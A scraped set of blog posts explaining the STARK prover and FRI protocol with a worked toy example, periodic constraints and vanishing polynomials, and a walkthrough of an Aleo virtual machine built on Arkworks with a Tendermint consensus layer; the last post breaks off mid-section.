Given their importance and applications, we decided to begin our library by implementing the STARKs’ prover. We had to implement finite field arithmetic and basic cryptographic stuff, such as Merkle trees and hash functions. We will continue with elliptic curves and SNARKs.</p>
STARKs</h2>
STARKs</a> (scalable, transparent arguments of knowledge) are cryptographic primitives, which are a convenient means to an end. The goal we are after is computational integrity, that is, showing that a computation was performed correctly (according to a set of instructions). For example, we want to prove that we computed the first 5000 values of a sequence correctly, or we ran a given machine learning algorithm, or we processed 4000 transactions in a blockchain. STARKs provide us with short proof of the integrity of the computation. The advantage STARKs gives us is that checking the proof is much faster than performing the naïve verification (re-executing the program by the verifier).</p>
There are many interesting resources to learn the basics of STARKs, such as Starkware’s STARK 101</a>, Anatomy of a STARK</a>, Ministark</a>, as well as Starkware’s blog on arithmetization (parts I</a> and II</a>).</p>
The STARK protocol contains the following steps:</p>
    * Arithmetization</span></span>
    * Transformation to polynomial equations.</span></span>
    * FRI, which has two steps: commitment and decommitment.</span></span></code></pre>Arithmetization</h2>
An execution trace is a table containing $w$ columns (the registers) and $T$ rows representing each state of the system. A trace looks like this:</p>
Register 1</th> Register 2</th> $\dots$</th> Register w</th></tr></thead>

$x_{1,0}$</td> $x_{2,0}$</td> $\dots$</td> $x_{w,0}$</td></tr>
$x_{1,1}$</td> $x_{2,1}$</td> $\dots$</td> $x_{w,1}$</td></tr>
$\vdots$</td> $\vdots$</td> $\ddots$</td> $\vdots$</td></tr>
$x_{1,T}$</td> $x_{2,T}$</td> $\dots$</td> $x_{w,T}$</td></tr>
</tbody></table>
We will interpret each column (register) as the evaluation of a polynomial over a domain (we will call it the trace evaluation domain). For example, we can say that $f_1(x)$ is the polynomial representing column 1 and thus:

$f_1(0)=x_{1,0}$

$f_1(1)=x_{1,1}$

$\vdots$

$f_1(T)=x_{1,T}$</p>
To make things easier and faster, we will use as trace evaluation domain a multiplicative subgroup, $\mathbb{Z_p}^\star$ of size $2^n$, such that $2^n \geq T$. That group has a generator, $\omega$, which spans all elements in the subgroup. The subgroup can be represented by the powers of $\omega$, $\{ 1, \omega , \omega^2 , \omega^3 ,…, \omega^N \}$. Our trace polynomial satisfies then

$f_1(1)=x_{1,0}$

$f_1(\omega)=x_{1,1}$

$\vdots$

$f_1(\omega^{T-1})=x_{1,T}$</p>
The elements in the execution trace satisfy certain relations given by the computation and boundary conditions. We call these relations constraints. They can be broadly classified into two groups:</p>
    * Boundary constraints.</span></span>
    * Transition constraints.</span></span></code></pre>
Boundary constraints are rather straightforward: they specify the value of a register at a given time. For example, when we initialize the computations, each register has a given value. In the case of the Fibonacci sequence,

$a_0=a_1=1$

If our trace consists of a single column representing the sequence, the first two elements are equal to one:

$x_{1,0}=1$

$x_{1,1}=1$</p>
We can translate the constraints into polynomial relations. We know that $x_{1,0}=f_1(1)$ and $x_{1,1}=f_1(\omega)$. If the constraint holds, say at $x=\omega$, then the monomial $x-\omega$ divides $f_1(x)-1$. This means that the result of the division of $f(x)-1$ by $x-\omega$ is a polynomial,

$$ Q_{BC,1}(x)=\frac{f_1(x)-1}{x-\omega} $$

Analogously,

$$ Q_{BC,0}(x)=\frac{f_1(x)-1}{x-1} $$</p>
One drawback in this approach is that if we have $n$ boundary constraints, we get $n$ polynomials. One optimization is to interpolate boundary constraints and obtain a new polynomial. In this case,

$f_{BC}(1)=1$

$f_{BC}(\omega)=1$

Combining everything, we get

$$ Q_{BC}(x)=\frac{f(x)-f_{BC}(x)}{Z_{BC}(x)}$$

where $Z_{BC}(x)$ is the polynomial vanishing on the points where the boundary conditions are enforced:

$Z_{BC}(x)=(x-1)(x-\omega)$</p>
Transition constraints are relations between different rows that can be applied at various calculation points. In the case of the Fibonacci sequence, we have $a_{n+2}=a_{n+1}+a_n$ for every $n={0,1,…T-2 }$. In terms of the trace polynomial,

$f_1(\omega^2 x)-f_1(\omega x)-f_1(x)=0$

If the constraint is satisfied, the following function should be a polynomial,

$$Q_T(x)=\frac{f_1(\omega^2 x)-f_1(\omega x)-f_1(x)}{Z_T(x)} $$

where $Z_T(x)$ is the vanishing polynomial where the transition constraints are enforced,

$Z_T(x)=\prod_{k=0}^{T-2} (x-\omega^k)$</p>
Transition constraints are commonly expressed as multivariate polynomials linking two consecutive rows of the execution trace. For example, if we denote by $x$ a given row and $y$ is the next, a constraint could be something like

$P(x,y)=y-x^2=0$

If we compose the constraint polynomial with the trace polynomial, we have $x=t(x)$, $y=t(\omega x)$, so

$t(\omega x) - t(x)^2=0$</p>
If we did the calculations properly, then $Q_{BC}(x)$ and $Q_T(x)$ should be polynomials; if not, they are rational functions (quotients of two polynomials). We can reduce proving that each of them is a polynomial by taking a random linear combination

$$ CP(x)=\alpha_{BC} Q_{BC}(x)+\alpha_{T} Q_T(x) $$

If $Q_{BC}(x)$ and $Q_T(x)$ are both polynomials, so is $CP(x)$. But if at least one of them is a rational function, then $CP(x)$ is unlikely to be a polynomial.</p>
Given that proving that $CP(x)$ is a polynomial is difficult, we will show that it is close to a low-degree polynomial. To do so, we will project $CP(x)$ to a new function with a smaller degree. We will continue taking projections until we reach a constant polynomial. The critical ingredient is that the projection operation respects the distance. If the original function is far from a low-degree polynomial, then the projections will also be far from it. Before jumping to the procedure (called FRI), we must commit to the trace polynomials.</p>
Committing to the trace</h2>
We need to evaluate the trace polynomials over a much larger domain; the domain size is $\beta 2^n$, where $\beta$ is the blowup factor. To avoid problems, we shift the domain by multiplying the elements by $h$, which belongs to the coset. The low-degree extension domain (simply domain) is given by

$$D = \{ h, h \eta , h \eta^2 , … , h \eta^{ 2^n -1} \} $$

Here $\eta$ is the generator of the subgroup of order $\beta 2^n$ so that it does not get confused with $\omega$ (though we could relate them by taking $\omega=\eta^\beta$).

We evaluate the trace polynomials over this large domain and obtain vectors representing each evaluation:

$$[ f_1 (h) , f_1 (h \eta) ,… , f_1 (h \eta^{ 2^n -1} )]$$

$$[f_2 (h) , f_2 (h \eta) , … , f_2 (h \eta^{ 2^n -1} )]$$

$$[f_w (h) , f_w (h \eta ) , … , f_w ( h \eta^{ 2^n -1} )]$$</p>
To commit to these evaluations, we build Merkle trees, and the prover sends the root of the Merkle trees to the verifier. To make things easier, the elements of each row of the low-degree extension of the trace are grouped into a single leaf.</p>
Committing to the composition polynomial</h2>
We use the same domain $$D = \{ h, h \eta , h \eta^2 , … , h \eta^{ 2^n -1} \} $$ to evaluate the composition polynomial. We can then create a Merkle tree from these evaluations and send the root to the verifier.</p>
Relating the LDE of execution trace and the composition polynomial</h2>
At some point, the verifier will ask the prover for the value of the composition polynomial at one point, $z$, that is, $CP(z)$. The verifier needs to be sure that the composition polynomial results from applying the polynomial constraints onto the trace polynomials. Given the value $z \in D$ (in DEEP, the value of $z$ is sampled outside the domain), the prover needs to send the values of the trace polynomials at given points so that the verifier can check the calculation. For example, in the case of Fibonacci (we will ignore all other constraints just for simplicity),

$P(u,v,w)=w-v-u=0$

$P(t(x),t(\omega x),t(\omega^2 x))=t(\omega^2x)-t(\omega x)-t(x)=0$

To create the composition polynomial, we must divide the previous polynomial by the corresponding vanishing polynomial. So, if we pick $x=z$, we have</p>
$$Q(z)=\frac{t(\omega^2z)-t(\omega z)-t(z)}{Z_D(z)}$$</p>
The prover needs to send those three values. Note that $z=h \eta^k$, so the prover needs to send the values of $t(\omega^2 h \eta^k)$, $t(\omega h \eta^k)$, $t( h \eta^k)$, which are separated by $\beta$ elements in the Merkle tree. The verifier takes the three values, evaluates the vanishing polynomials, and checks that

$Q(z)=CP(z)$</p>
This way, the verifier is convinced that the composition polynomial is related to the execution trace via the constraint polynomials.</p>
FRI protocol</h2>
The prover must show that $CP(x)$ is close to a low-degree polynomial. To do so, he will randomly fold the polynomial, reducing the degree, until he gets a constant polynomial (in optimizations, obtaining a constant polynomial is unnecessary, as the prover could send all the coefficients of a polynomial and have the verifier check it). The FRI protocol has two steps: commit and decommit.</p>
Commitment</h3>
The prover takes $CP(x)$ and splits it in the following way:

$$g(x^2)=\frac{CP(x)+CP(-x)}{2}$$

$$x h(x^2)=\frac{CP(x)-CP(-x)}{2}$$

so that

$$CP(x)=g(x^2)+x h(x^2)$$

The verifier chooses a random value $\alpha_0$, and the prover forms the polynomial,

$P_1(x)=g(x^2)+\alpha_0 h(x^2)$

with the new domain $D_1 = \{ h^2 , h^2 \eta^2 , … , h^2 \eta^m \}$ having half the size of $D$.</p>
The prover can perform the low-degree extension by evaluating $P_1(x)$ over $D_1$ and then commit to it by creating a Merkle tree and sending the root. He can continue with the procedure by halving the degree at each step. For step $k$, we have

$$P_k(y^2)=\frac{P_{k-1}(y)+P_{k-1}(-y)}{2}+\alpha_{k-1}\left(\frac{P_{k-1}(y)-P_{k-1}(-y)}{2}\right)$$

and

$$D_k = \{ h^{ 2^{k-1} } , (h \eta)^{ 2^{k-1} } , … ,( \eta^l h)^{ 2^{k-1} } \}$$

The prover evaluates $P_k(x)$ over $D_k$ and commits to it, sending the Merkle root.</p>
Decommitment</h3>
The verifier chooses at random a point $q$ belonging to $D$. The prover needs to convince him that the trace polynomials and composition polynomial are related (we covered that previously) and that the elements of consecutive FRI layers are also related. For each layer, the prover needs to send two elements to the verifier, $P_k(z)$ and $P_k(-z)$. He also needs to show that these elements belong to the corresponding Merkle tree, so the authentication paths for each element are also required.</p>
The verifier can check the correctness of the FRI layers by performing a colinearity check. Given $P_k(z)$, $P_k(-z)$ and $P_{k+1}(z^2)$, the verifier can compute

$$g_{k+1}(z^2)=\frac{P_k(z)+P_k(-z)}{2}$$

$$h_{k+1}(z^2)=\frac{P_k(z)-P_k(-z)}{2z}$$

and get the value for the next layer

$$u_{k+1}=g_{k+1}(z^2)+\alpha_k h_{k+1}(z^2)$$

If the prover performed the calculations correctly, then

$$u_{k+1}=P_{k+1}(z^2)$$</p>
A toy example for FRI</h2>
We will use a simple example to understand how everything works on FRI. We choose $p=17$, whose multiplicative group has order $16=2^4$ and set $\eta=3$, which is a primitive root of unity (that is, $3^{16}=1$ and $3^k \neq 1$ for $0 <k<16$). Our composition polynomial is $P_0 (x) = x^3 + x^2 + 1$. The domain for the LDE is simply $ D_0 = \mathbb{Z_{17}}^\star = \{1 , 2 , 3 , 4 , 5 , 6 , … , 16 \}$. The following table contains the LDE of $P_0(x)$:</p>
Index</th> $x$</th> $P_0(x)$</th> Index</th> $x$</th> $P_0(x)$</th></tr></thead>

0</td> 1</td> 3</td> 8</td> 16</td> 1</td></tr>
1</td> 3</td> 3</td> 9</td> 14</td> 0</td></tr>
2</td> 9</td> 12</td> 10</td> 8</td> 16</td></tr>
3</td> 10</td> 13</td> 11</td> 7</td> 2</td></tr>
4</td> 13</td> 4</td> 12</td> 4</td> 13</td></tr>
5</td> 5</td> 15</td> 13</td> 12</td> 3</td></tr>
6</td> 15</td> 14</td> 14</td> 2</td> 13</td></tr>
7</td> 11</td> 8</td> 15</td> 6</td> 15</td></tr>
</tbody></table>
Suppose the verifier samples $\beta_0=3$. The prover performs the random folding over $P_0(x)$,

$g_1( x^2 ) = 1 + x^2$

$xh_1 ( x^2 ) = x^3 $

so

$P_1 ( x^2 ) = 1 + ( 1 + \beta_0) x^2$

To make things simpler,

$P_1(y)=1+4y$

with $y = x^2$. The new domain is obtained by squaring the elements of $D_0$. The LDE of $P_1(y)$ is</p>
Index</th> $y$</th> $P_1(y)$</th> Index</th> $y$</th> $P_1(y)$</th></tr></thead>

0</td> 1</td> 5</td> 4</td> 16</td> 14</td></tr>
1</td> 9</td> 3</td> 5</td> 8</td> 16</td></tr>
2</td> 13</td> 2</td> 6</td> 4</td> 0</td></tr>
3</td> 15</td> 10</td> 7</td> 2</td> 9</td></tr>
</tbody></table>
The verifier samples $\beta_1=2$ and the prover folds $P_1(y)$ to get $P_2(z)$,

$P_2(z)=1+4\beta_1=9$

which is a constant polynomial. The domain $D_2 = \{ 1 , 13 , 16 , 4 \}$. All the elements in the LDE evaluate to 9, so there is no need for a table.</p>
The evaluations of the polynomials $P_0(x)$, $P_1(x)$, and $P_2(x)$ are each committed using a Merkle tree and sent to the verifier.</p>
Suppose the verifier selects index 4 in the LDE to check the correctness of the FRI layers. The prover needs to send him the following:</p>
    * $P_0(13)=4$ and $P_0(-13)=P_0(4)=13$ and their authentication paths.</span></span>
    * $P_1(16)=14$ and $P_1(-16)=P_1(1)=5$ and their authentication paths.</span></span>
    * $P_2(4)=9$.</span></span></code></pre>
We can see that, for the first layer, the prover passes the values at positions 4 and 12, then 4 and 1 (which is $index+|D_1|/2$, where $|D_1|$ is the number of elements in $D_1$, but since 8 exceeds the maximum value, we wrap around).</p>
The verifier does the following calculation,

$$u=\frac{P_0(13)+P_0(4)}{2}+\beta_0\left(\frac{P_0(13)-P_0(4)}{2\times 13}\right)$$</p>
Recall that division by $t$ is simply multiplication by $t^{-1}$. In the case of $2$, we have $2^{-1}=9$, since $2\times 9=18\equiv 1 \pmod{17}$. Thus,

$$u=2^{-1}\left(4+13\right)+3\times 9^{-1}\left(4-13\right)$$

The first term is $0$, while the second is $48\equiv 14 \pmod{17}$, so

$u=14$.

Next, he checks

$u=P_1(16)$

Both are $14$, so the first layer is correct.</p>
The verifier moves on to the next layer. He needs to calculate

$$u=\frac{P_1(16)+P_1(1)}{2}+\beta_1\left(\frac{P_1(16)-P_1(1)}{2\times 16}\right)$$</p>
If we work the calculations,

$$u=\frac{2}{2}+2\left(\frac{9}{2 \times 16}\right)$$

But this is just

$$u=1+(-9)=1+8=9$$

Now,

$$P_2(4)=9=u$$

so all the layers have been checked. You should try selecting an index and showing that all the calculations match.</p>
Summary</h2>
STARKs are powerful cryptographic primitives allowing a party to prove the integrity of a computation. To generate the proof, we obtain the execution trace of the program and interpret each column of the trace as the evaluations of a polynomial over a “nice” domain. The rows of the execution trace are related by low-degree polynomials, which determine the constraints. When we compose the constraint polynomials with the trace polynomials, we enforce the constraints over the execution trace. We can then divide them by the vanishing polynomial over their validity domain (the places where each constraint is enforced); if the constraints hold, the division is exact and yields a polynomial. Instead of proving that the result is a polynomial, STARKs show that the result is close to a low-degree polynomial. FRI randomly folds the function, halving the degree at each step; the critical point is that this folding preserves distance from low-degree polynomials. The protocol contains two phases: commit, in which the prover binds himself to evaluations of the polynomials over their corresponding domain, and decommit, where he generates the proof that allows the verifier to check the calculations. In an upcoming post, we will cover some optimizations and examples.</p>


Everything you wanted to know about periodic constraints in STARKs but nobody told you
Unknown — Fri, 24 Feb 2023 00:00:00 +0000
As you might have already guessed we are studying all the literature and code available to become one of big players in the industry. We want to thank Eli Ben-Sasson</a> and Starkware</a> for the amazing work they’ve been doing in the space and for helping us to learn all this. We also want to thank Max Gillett</a> for the time he has invested in talking with us about all these things. They have been amazing with us and we hope we can continue learning a lot from them.</p>
Introduction</strong></p>
ZK-STARKs</a> (zero-knowledge scalable, transparent, post-quantum arguments of knowledge) are cryptographic tools that allow one party to prove the integrity of a computation. For example, a party can show that he computed the first 1000 elements of a Fibonacci sequence correctly, ran a given machine learning algorithm, or correctly processed 5000 Ethereum transactions. Moreover, checking the resulting proof is much faster than performing the naïve re-execution of the computation by a verifier (the verification time scales logarithmically in the calculation size). Given their properties, they have attracted interest in many areas; among them, they can solve the scalability problems that decentralized ledgers suffer from.</p>
There are many interesting resources to learn the basics of STARKs, such as Starkware’s STARK 101</a>, Anatomy of a STARK</a>, Ministark</a>, as well as Starkware’s blog on arithmetization (parts I</a> and II</a>). In this post, we will focus on how constraints are enforced and how to deal with them when applied periodically. Soon we will be posting a more in-depth version of STARKs.</p>
The starting point for STARKs is arithmetization. We generate the execution trace of the program, obtaining a table showing how each register evolves according to the instructions being executed. The values of the execution table are related by constraints (usually low-degree polynomials). We will focus, in particular, on transition constraints and how to check that the values of the trace satisfy them.</p>
Transition constraints</strong></p>
A transition constraint dictates the relations between different states of a computation. Suppose we have one register, which contains the elements of a Fibonacci sequence,</p>
$a_0=a_1=1$</p>
$a_{n+2}=a_{n+1}+a_n$</p>
The last equation gives the transition constraint for the Fibonacci sequence; the others handle the boundary constraints for the problem, and it is easier to deal with them. To make our discussion easier, suppose that we performed $2^m$ steps of the Fibonacci sequence for some $m \geq 1$. We get, by rewriting the constraints and analyzing each index,</p>
$a_2-a_1-a_0=0$</p>
$a_3-a_2-a_1=0$</p>
$a_4-a_3-a_2=0$</p>
and so on. We can convert the trace elements into polynomials by interpolating over a suitable domain. To make things easier, we choose the $n$-th roots of unity, which enables us to perform interpolation via the fast Fourier transform. The roots are spanned by one element (a generator, $g$): by taking its powers, we get all the $n$-th roots of unity, $\left\{1,g,g^2,g^3,…,g^{n-1}\right\}$.Let us call $t(x)$ the polynomial interpolating the trace, that is, the polynomial taking the following values:</p>
$t(1)=a_0$</p>
$t(g)=a_1$</p>
$t(g^2)=a_2$</p>
$\vdots$</p>
$t(g^{n-1})=a_{n-1}$</p>
We can express the constraints as</p>
$t(g^2)-t(g)-t(1)=0$</p>
$t(g^3)-t(g^2)-t(g)=0$</p>
$t(g^4)-t(g^3)-t(g^2)=0$</p>
In a generic way,</p>
$t(g^2x)-t(gx)-t(x)=0$</p>
The way we can check that the constraints are enforced is by verifying that the polynomial $p(x)=t(g^2x)-t(gx)-t(x)$ is divisible by $(x-x_0)$, where $x_0$ is the point where we enforce the constraint. Another way to see this is that the resulting function</p>
$$Q(x)=\frac{p(x)}{x-x_0} $$</p>
is a polynomial. Instead of showing that $Q(x)$ is a polynomial, the STARK IOP proves that it is close to a low-degree polynomial.</p>
In the case of the Fibonacci sequence, the constraint is valid for $x_0 \in \left\{1,g,g^2,…g^{n-3} \right\}$. Given that it is divisible by each factor, it is divisible by the product of all of them,</p>
$Z_D(x)=\prod_{0}^{n-3} (x-g^k)$</p>
The problem we face with this polynomial is that, to compute it, we need to perform a linear amount of multiplications, that is, as many multiplications as factors there are. Fortunately, the roots of unity have the following property:</p>
$s(x)=\prod_{i=0}^{n-1} (x-g^k)=x^n-1$</p>
So, instead of performing a linear amount of operations, we can calculate $Z_D(x)$ from $s(x)$ by taking out the missing factors:</p>
$$Z_D(x)=\frac{ s(x)}{\prod_j (x-g^j)}=\frac{x^n-1}{(x-g^{n-1})(x-g^{n-2})} $$</p>
The advantage of STARKs is that if a constraint is repeated many times, we can express that concisely. The only change goes in the vanishing polynomial $Z_D(x)$, which adds factors.</p>
Constraints repeating after $m$ steps</strong></p>
In a case such as Fibonacci’s, the constraint involves almost all points in the domain, so calculating the vanishing polynomial, $Z_D(x)$, is straightforward. But what happens when a constraint is applied only at certain points? For example, in EthStark, some transition constraints are applied only after $m$ steps.</p>
To fix ideas, suppose that we have a transition constraint of the form</p>
$f(x,gx,…g^d x)=0$</p>
Our Fibonacci sequence fits this form. We will now consider that it applies every four steps; that is, the constraint is enforced at $x_0 \in \left\{1, g^4, g^8, g^{12},…\right\}$</p>
The vanishing polynomial looks like</p>
$Z_D(x)=\prod_k (x-g^{4k})$</p>
If $g$ is a generator of the $n$-th roots of unity, $g^4$ is a generator of the $n/4$-th roots of unity, $\omega=g^4$. So, we can rewrite the former as</p>
$Z_D(x)=\prod_k (x-\omega^k)$</p>
But since the product is over all $n/4$-th roots of unity,$Z_D(x)=x^{n/4}-1$. If the constraint is applied every 32 steps, as in EthStark, the vanishing polynomial is simply$Z_D(x)=x^{n/32}-1$. If we skip some steps, we need to take those out. For example, suppose we have two constraints</p>
$f_1(x,g x)=0$</p>
$f_2(x, g x)=0$.</p>
Constraint 2 is enforced every four steps, and constraint 1 is enforced every two (but not where constraint 2 is valid). To make it clear, constraint 2 is valid at $x_0 \in \left\{1,g^4,g^8,g^{12},…\right\}$ and constraint 1 is valid at $\left\{g^2, g^6, g^{10},… \right\}$. The vanishing polynomial for constraint 2 is</p>
$Z_{D,2}(x)=\prod (x-g^{4k})$</p>
and we have already found the solution, $Z_{D,2}(x)=(x^{n/4}-1)$. For constraint 1, we have</p>
$Z_{D,1} =\prod_{i \neq 0 \pmod{2} } (x-g^{2i})$</p>
The $i \neq 0 \pmod{2}$ is just a way to say that the product only considers odd values of $i$ (so multiples of 4 are ruled out). We can apply the same trick as before:</p>
$$Z_{D,1}=\frac{ \prod (x-g^{2i})}{\prod (x-g^{4k})}$$</p>
This may seem weird, but we know precisely how to calculate each of them:</p>
$$Z_{D,1}(x)=\frac{x^{n/2}-1}{x^{n/4}-1} $$</p>
From here, we can remove some points where the constraint is not enforced. For example, if it is not valid at $x_0=6$,</p>
$$Z_{D,1}(x)=\frac{x^{n/2}-1}{(x^{n/4}-1)(x-g^6)} $$</p>
If we added a constraint $f_3(x,gx)$ that is enforced on steps $\left\{32,64,92,… \right\}$, we would have 3 vanishing polynomials,</p>
$$Z_{D,3}=\frac{x^{n/32}-1}{x-1} $$</p>
$$Z_{D,2}=\frac{(x^{n/4}-1)(x-1)}{x^{n/32}-1} $$</p>
$$Z_{D,1}(x)=\frac{x^{n/2}-1}{x^{n/4}-1} $$</p>
So, by taking advantage of the properties of the roots of unity, we can enforce constraints that are applied periodically.</p>
Summary</strong></p>
STARKs are a powerful tool that allows us to prove the integrity of a computation. To that end, STARKs start with the execution trace of a program and interpolate each column using polynomials. To see that the trace is valid, we need to check that all the constraints given by the computation are enforced. These constraints can be composed with the trace polynomials; if the constraints hold at step $T$, the resulting polynomial $P(x)$ should be divisible by $(x-g^{T-1})$ or, equivalently, there is a polynomial $Q(x)$ such that $P(x)=Q(x)(x-g^{T-1})$. If a constraint is applied multiple times, we can use the following facts to express them concisely:</p>
    * The polynomial $P(x)$ is divisible by the product of factors of the form $x-x_0$.</span></span>
    * We can easily shift the constraints thanks to the structure of the multiplicative subgroups.</span></span>
    * The product of all elements in the multiplicative subgroups yield $x^n-1$, where $n$ is the subgroup's order (number of elements).</span></span></code></pre>
This results in advantages in terms of performance and ease of understanding.</p>
Finally, we will post a beginner’s version of STARKs soon, so stay tuned!</p>


A walkthrough on the open source Aleo VM implemented with Arkworks and blockchain implemented with Tendermint
Unknown — Fri, 03 Feb 2023 00:00:00 +0000
Introduction</h2>
For the last 12 weeks, at LambdaClass, we have been developing an alternative implementation of the Aleo Blockchain. We want to thank Alex Pruden and Howard Wu from Aleo for their support throughout the process.</p>
At a high level, the project consists of a Consensus Layer using Tendermint and a Zero-Knowledge Virtual Machine targeting Aleo instructions implemented with the arkworks framework.</p>
You can check out the code:</p>
    * [Tendermint Blockchain implementation](https://github.com/lambdaclass/aleo_lambda_blockchain)</span></span>
    * [Virtual Machine implemented with Arkworks](https://github.com/lambdaclass/aleo_lambda_vm)</span></span></code></pre>
The key features of this blockchain revolve around the fact that it is designed to be a fully-private platform for users to develop applications that can then be built and executed off-chain, generating a proof of execution which is then sent to the blockchain nodes for verification and storage.</p>

If you’re in need of a team of engineers and researchers who’ve been working together for a decade in areas like distributed systems, machine learning, compilers, and cryptography, we’re your guys. Wanna chat more about it? Book a meeting with us by sending us an email</a></p>

Consensus Layer</h2>
The consensus layer is in charge of validating incoming transactions which perform state changes and replicating these transactions (and the order in which they were performed) on an arbitrary number of nodes.</p>
To achieve this, we decided to utilize Tendermint Core</a>, an implementation of a consensus mechanism written in Go. Alongside the Tendermint Core binaries, you need to run your implementation of an Application Blockchain Interface</em> (or ABCI</em> for short). This ABCI needs to implement specific hooks that Tendermint Core calls through a socket whenever required. For example, when receiving a transaction, it will call CheckTx</code>, which is supposed to validate the transaction before entering it into the mempool and relaying it to other nodes. This flexible approach allows for the ABCI to be written in any language as long as it responds to the calls appropriately. We decided to write our implementation in Rust.</p>
You can see the code for this implementation here</a>. The repository also contains a CLI application to compile, deploy and execute programs and send these transactions to the blockchain easily. It also has several other features related to accounts, such as retrieving a user’s balance or seeing which records</em> the account possesses. We will explain the motivation behind records in the integration section of this post, but they are essentially a way to encapsulate state and ownership functionality in the blockchain.</p>
Design considerations</h3>
</p>
Considering the VM implementation and the requirements from the blockchain, we had to make several design decisions on the consensus layer. Here’s a general overview of how Tendermint Core was implemented:</p>
    * The Tendermint Core and the ABCI need to run side by side in the same node and are coupled by the interface defined by the protocol's hooks.</span></span>
    * All code executed on the ABCI needs to be deterministic and isolated from external services since we want to ensure all transactions perform deterministic state changes on every node in the network.</span></span>
    * The ABCI implements two databases to maintain the current state of the blockchain: The program store and the record store. </span></span>
      * The program store keeps track of every deployed program's verifying keys and uses. The store contains the `credits` program's keys as a built-in default. This program defines credit records. It is essentially a native Aleo program that has functions for managing credit records.</span></span>
      * The record store encapsulates functionality related to validating whether the records utilized in incoming transactions have already been spent. </span></span>
        * The privacy requirements imply that we cannot disclose what records have been spent and which have not. Due to this, any record in the blockchain (i.e., it was output from the execution of a program) is stored separately from records that have been spent, of which we only store serial numbers.</span></span>
    * The genesis block needs to be provided to Tendermint on startup and is done through a JSON file. We have written a particular binary to generate it for any number of nodes and give each of them a fixed amount of starting credits.</span></span>
    * To make testing simple, we have created several `make` targets to initialize and start multiple validators that can run locally or on a remote network.</span></span>
    * Both the CLI and the consensus layer support Aleo's SnarkVM and our own LambdaVM and are currently interchangeable through a compiler flag</span></span></code></pre>Staking</h3>
Tendermint supports adding new nodes to the network. In general, nodes in the network can work in two different modes:</p>
    * Non-validator: The node catches up with the blockchain by performing every transaction but does not have voting power to validate and commit blocks.</span></span>
    * Validator: The node is part of the network and can vote and sign blocks.</span></span></code></pre>
To add a non-validator, the node needs to have the same Genesis block and point to persistent peers (IP addresses acting as fixed nodes in the network). To transform a node into a validator, the ABCI needs to implement functionality to update the voting power of a Tendermint node.</p>
For this, we implemented a stake</code> command to “freeze” credits by exchanging them for staking records (and increase the voting power of a validator), which you can, in turn, unstake</code> whenever you desire (decreasing the voting power accordingly).</p>
When a node is a validator, it gets rewards on each block commit where it was involved.</p>
Virtual Machine</h2>
At a high level, our VM provides an API to take an Aleo program that looks like this:</p>
program main.aleo;</span></span>
        </span></span>
function add:</span></span>
    input r0 as u16.public;</span></span>
    input r1 as u16.private;</span></span>
    add r0 r1 into r2;</span></span>
    output r2 as u16.public;</span></span></code></pre>
And generate a pair of proving and verifying keys for it (this is usually called building</em> or synthesizing</em> the program), allowing anyone to execute the program and provide proof of it or verify said proof. The consensus layer uses this to deploy programs (i.e., upload their verifying key along with the code), execute them, and verify them.</p>
Internally, this VM uses Arkworks</a> as a backend. Programs are turned into a Rank One Constraint System (R1CS</code>), which is then passed on to the Marlin</a> prover for execution. As we started using Arkworks, we noticed some aspects of the API and its genericity were becoming a burden for developers, so we created a thin wrapper around it called Simpleworks</a>, along with some basic documentation</a>.</p>
Example</h3>
Given the following Aleo program</p>
program foo.aleo;</span></span>
</span>
function main:</span></span>
    input r0 as u64.public;</span></span>
    input r1 as u64.public;</span></span>
    add r0 r1 into r2;</span></span>
    output r2 as u64.public;</span></span></code></pre>
Executing the function main</code> would look like this:</p>
use lambdavm::jaleo::UserInputValueType::U16;</span></span>
</span>
fn main() {</span></span>
    use lambdavm::{build_program, execute_function};</span></span>
</span>
    // Parse the program</span></span>
    let program_string = std::fs::read_to_string("./programs/add/main.aleo").unwrap();</span></span>
    let (program, build) = build_program(&program_string).unwrap();</span></span>
    let function = String::from("main");</span></span>
    // Declare the inputs (it is the same for public or private)</span></span>
    let user_inputs = vec![U16(1), U16(1)];</span></span>
</span>
    // Execute the function</span></span>
    let (_execution_trace, proof) = execute_function(&program, &function, &user_inputs).unwrap();</span></span>
    let (_proving_key, verifying_key) = build.get(&function).unwrap();</span></span>
</span>
    assert!(lambdavm::verify_proof(verifying_key.clone(), &user_inputs, &proof).unwrap())</span></span>
}</span></span></code></pre>Internals</h3>
The most significant task our VM has to perform is turning the program into an arithmetic circuit, as the rest of the work, namely generating the proof and verifying it, is pretty straightforward with the Arkworks API.</p>
Before continuing, you should have at least a basic understanding of arithmetic circuits and how Arkworks lets you work with them. You can read about it here</a>.</p>
To generate the circuit, we go through the following steps:</p>
    * Take the program's source code and parse it into a `Program` containing all the relevant information about it (a list of all input and output instructions, whether they are public or private, a list of all regular instructions like add and its operands, etc.). We currently rely on SnarkVM's parser but plan to write our own.</span></span>
    * Instantiate an Arkworks `ConstraintSystem`, which will hold all our circuit's constraints by the end.</span></span>
    * For every input instruction, instantiate its corresponding `Gadget`. You can think of a gadget as the equivalent of a native type (like `u8`) inside an arithmetic circuit. If the input is public, the gadget is made public; otherwise, it's made a `witness`, i.e., private. In our example, the first instruction `input r0 as u16.public` becomes a call to `UInt16Gadget.new_input(...)` and the second instruction becomes `UInt16Gadget.new_witness(...)`.</span></span>
    * For every regular instruction, we use the gadget's associated function to perform the operation and generate its constraints inside our `ConstraintSystem`. In our example, when we encounter the `add r0 r1 into r2;` instruction, we call `UInt16Gadget.addmany(...)`. This is an arkworks provided function that will take a list of `UInt16's, add them, implicitly mutate the `ConstraintSystem` with all the associated constraints, then return the value of the sum. Not all instructions have a corresponding arkworks function implemented, so for those, we had to roll our own.</span></span>
    * For every output instruction, assign to the register the computed value.</span></span></code></pre>
Because a program can have multiple registers interacting with each other, to do the above, we have to keep track of each register and its value as we go. For this, we keep an internal hash table throughout execution.</p>
Additionally, we ran some benchmarks comparing our VM with Aleo’s SnarkVM</code>, and our results show we are a few times faster than it; details will be published in a separate post. The code for benchmarks is in our VM Repo</a>.</p>
VM-Consensus Integration Layer</h2>
Above, we discussed how the VM allows running arbitrary Aleo programs that can be deployed, executed locally, and then verified on the Aleo blockchain. Each Aleo transaction is either the deployment or the proof of execution of a program (this is technically inaccurate, as there can be multiple of these per transaction, but we’ll ignore that for simplicity). In the case of executions, nodes use the program’s verifying key to verify the correct execution before committing transactions to a block.</p>
After we got a basic VM version working, we realized that getting a fully functional Aleo blockchain required more work than just the above. Transactions would be of very little use if they proved that some computation was done correctly. To be useful, they also need to modify the state</em>. In Aleo, the state is managed through records</em> in what is essentially a UTXO</a> model similar to Bitcoin. Typically, when a user sends a transaction, they will spend some records they own to create new ones in their place.</p>
